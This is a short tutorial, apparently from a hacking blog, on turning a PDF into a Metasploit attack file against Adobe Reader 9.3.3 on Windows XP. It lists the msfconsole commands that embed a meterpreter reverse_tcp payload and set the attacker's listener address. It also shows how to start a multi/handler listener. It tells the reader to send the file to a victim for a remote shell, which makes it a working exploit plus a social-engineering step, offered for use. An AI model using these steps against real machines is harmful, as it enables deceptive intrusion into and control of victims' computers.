This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack.
After we successfully generate the malicious PDF, it will stored on your local computer
Exploit Targets
0 - Adobe Reader <= v9.3.3 (Windows XP SP3 English) (default)
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename story.pdf
Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit
/root/.msf4/local/story.pdf
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send your story.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
